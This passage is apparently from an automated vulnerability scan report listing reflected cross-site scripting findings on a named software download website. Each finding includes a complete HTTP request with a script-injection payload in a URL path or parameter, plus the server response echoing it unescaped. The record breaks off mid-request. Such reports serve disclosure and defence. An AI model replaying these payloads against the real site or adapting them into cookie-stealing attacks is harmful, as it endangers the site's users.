Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e97"><script>alert(1)</script>f344c05b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142"/>
...[SNIP]...

4.1794. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa475"><script>alert(1)</script>9b2f637b814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html?aa475"><script>alert(1)</script>9b2f637b814=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html?aa475"><script>alert(1)</script>9b2f637b814=1"/>
...[SNIP]...

4.1795. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71c6"><script>alert(1)</script>a82c103a4fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html" />
...[SNIP]...

4.1796. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b8"><script>alert(1)</script>79d2914fb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66879


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55"/>
...[SNIP]...

4.1797. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89e3"><script>alert(1)</script>4467668b615 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1"/>
...[SNIP]...

4.1798. http://www.x64bitdownload.com/drivers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd51"><script>alert(1)</script>917ba9ab7e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers5cd51"><script>alert(1)</script>917ba9ab7e5/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers5cd51"><script>alert(1)</script>917ba9ab7e5/" />
...[SNIP]...

4.1799. http://www.x64bitdownload.com/drivers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a41"><script>alert(1)</script>03ddb5827b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1" />
...[SNIP]...

4.1800. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b223c"><script>alert(1)</script>5bbc5b84076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html" />
...[SNIP]...

4.1801. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b85"><script>alert(1)</script>04e93731252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252" />
...[SNIP]...

4.1802. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /drivers/64-bit-vista-drivers.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a8f2"><script>alert(1)</script>1e0be29bacc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1" />
...[SNIP]...

4.1803. http://www.x64bitdownload.com/featured-software.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /featured-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288dc"><script>alert(1)</script>a9da18bcc18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html288dc"><script>alert(1)</script>a9da18bcc18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html288dc"><script>alert(1)</script>a9da18bcc18" />
...[SNIP]...

4.1804. http://www.x64bitdownload.com/featured-software.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /featured-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0316"><script>alert(1)</script>cac9cd247c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:44 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1" />
...[SNIP]...

4.1805. http://www.x64bitdownload.com/js/general.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /js/general.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9880a"><script>alert(1)</script>87d32f52238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9880a"><script>alert(1)</script>87d32f52238/general.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js9880a"><script>alert(1)</script>87d32f52238/general.js" />
...[SNIP]...

4.1806. http://www.x64bitdownload.com/js/general.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /js/general.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a0"><script>alert(1)</script>0ea982c7227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/general.js4c9a0"><script>alert(1)</script>0ea982c7227 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/general.js4c9a0"><script>alert(1)</script>0ea982c7227" />
...[SNIP]...

4.1807. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /js/rating.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62f2"><script>alert(1)</script>4ce7a17d51f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js" />
...[SNIP]...

4.1808. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /js/rating.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca2f"><script>alert(1)</script>e3cfc32ca97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97" />
...[SNIP]...

4.1809. http://www.x64bitdownload.com/linktous.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /linktous.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bea"><script>alert(1)</script>99c6425b343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.htmlb4bea"><script>alert(1)</script>99c6425b343 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.htmlb4bea"><script>alert(1)</script>99c6425b343" />
...[SNIP]...

4.1810. http://www.x64bitdownload.com/linktous.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /linktous.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe20"><script>alert(1)</script>73a79dc6461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
